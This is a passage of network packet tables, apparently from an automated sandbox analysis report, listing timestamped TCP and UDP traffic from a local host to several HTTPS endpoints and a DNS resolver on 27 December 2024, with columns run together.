                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.140634060 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.141406059 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.141413927 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.161098957 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.161108017 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.707788944 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.707825899 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.707969904 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.707984924 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:10.149355888 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:10.149439096 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:10.149441957 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:10.150124073 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:10.150266886 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:10.150285006 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:11.876146078 CET4434992223.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:11.876240015 CET4434992223.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:11.876415968 CET49922443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:11.885337114 CET4434992323.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:11.885566950 CET4434992323.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:11.885627985 CET49923443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:33.411031008 CET49841443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:33.411048889 CET44349841172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:33.411147118 CET49842443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:33.411164999 CET44349842172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:36.865422964 CET49923443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:36.865427971 CET49922443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:36.865444899 CET4434992323.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:36.865452051 CET4434992223.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.892164946 CET49924443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.892178059 CET44349924204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.954679012 CET49925443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:37.954689980 CET44349925204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.133418083 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.133446932 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.133522987 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.133696079 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:38.133708954 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.355520964 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.356002092 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.356010914 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.357610941 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.357709885 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.357969999 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.358032942 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.409231901 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.409255028 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:39.454799891 CET50052443192.168.2.523.44.201.20
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.373295069 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.373336077 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.373445034 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.373608112 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.373625994 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.435496092 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.435535908 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.435619116 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.435807943 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:40.435821056 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.283005953 CET49837443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.283031940 CET44349837162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.678550959 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.678966999 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.678982973 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.679299116 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.679610968 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.679677963 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.679770947 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.703138113 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.703450918 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.703468084 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.703804970 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.704199076 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.704199076 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.704216003 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.704281092 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.723330021 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:41.751791954 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.186484098 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.186563015 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.186619997 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.186829090 CET50058443192.168.2.523.219.161.152
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.186845064 CET4435005823.219.161.152192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.206011057 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.206080914 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.206167936 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.206429005 CET50059443192.168.2.523.219.161.132
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:42.206435919 CET4435005923.219.161.132192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:58.681421041 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:58.681513071 CET4435005223.44.201.20192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:58.681565046 CET50052443192.168.2.523.44.201.20

                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.425059080 CET6515653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:19:58.563771009 CET53651561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.714807034 CET6488753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:00.949089050 CET53648871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.347125053 CET53518811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.378448009 CET53536121.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.431166887 CET5150253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.431166887 CET5272753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.568036079 CET53515021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:17.569237947 CET53527271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:20.258251905 CET53610751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:21.951713085 CET53549031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:23.859550953 CET53610301.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.195646048 CET5473153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.195830107 CET6313653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:34.333406925 CET53631361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:36.865259886 CET5080953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:36.865539074 CET6036153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.849261045 CET5248853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.849858046 CET5515753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.986181974 CET53524881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:37.986382961 CET53551571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.191853046 CET5797753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.192117929 CET5659753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.192800045 CET5723053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.193042040 CET5426153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.220659018 CET5810453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.220896006 CET5692253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341435909 CET53579771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341459990 CET53565971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341470957 CET53572301.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.341481924 CET53542611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.564251900 CET53581041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:38.564275026 CET53569221.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:40.187550068 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:40.460510969 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:40.489448071 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:40.771429062 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.097524881 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.280739069 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.280764103 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.280775070 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.280869007 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.281793118 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.286695957 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.289666891 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.315937042 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.351310015 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.361679077 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.377315044 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.420805931 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.534014940 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.534229040 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.535168886 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.535202026 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.535559893 CET4942853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.535777092 CET6549053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.549186945 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.549813986 CET4931153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.550067902 CET6501753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.550594091 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.591054916 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.591155052 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.593056917 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.593225956 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.593238115 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.593904018 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.595526934 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.609541893 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.609635115 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.609643936 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.609652042 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.609947920 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.610059023 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.610132933 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.614200115 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615045071 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615641117 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615700006 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615709066 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615751982 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615778923 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.615859985 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.639904022 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.640472889 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.640661001 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.640835047 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.641038895 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.641186953 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.672733068 CET53654901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.672926903 CET53494281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.674787998 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.674932003 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.677752972 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.678399086 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.687933922 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.700268984 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.700308084 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.734028101 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.857127905 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.857657909 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.859472990 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.871872902 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.873035908 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.873505116 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.919683933 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.919773102 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.919786930 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.919795990 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.920209885 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.920309067 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.933399916 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.933418989 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.942608118 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.952931881 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:41.998665094 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.001354933 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.002721071 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.004137039 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.004653931 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.004771948 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.004864931 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.006798029 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.017174006 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.034020901 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.243100882 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.266235113 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.266803026 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.276588917 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.276854038 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.277337074 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.277579069 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.279753923 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.294833899 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.340764999 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.341943026 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.357531071 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.358170986 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.358457088 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.363446951 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.379518986 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.461944103 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.462160110 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.603005886 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.603728056 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.618464947 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.619597912 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.620074034 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.627311945 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.631458998 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.687494040 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.688247919 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.702979088 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.703718901 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.704057932 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.786200047 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.787527084 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.787600040 CET44359225172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.788168907 CET59225443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.971527100 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.971906900 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.976480961 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.976511002 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.976610899 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.977183104 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.977782011 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.978013039 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.154055119 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.154170990 CET58994443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.478445053 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.490919113 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.493197918 CET44358994172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.493438005 CET58994443192.168.2.5172.64.41.3
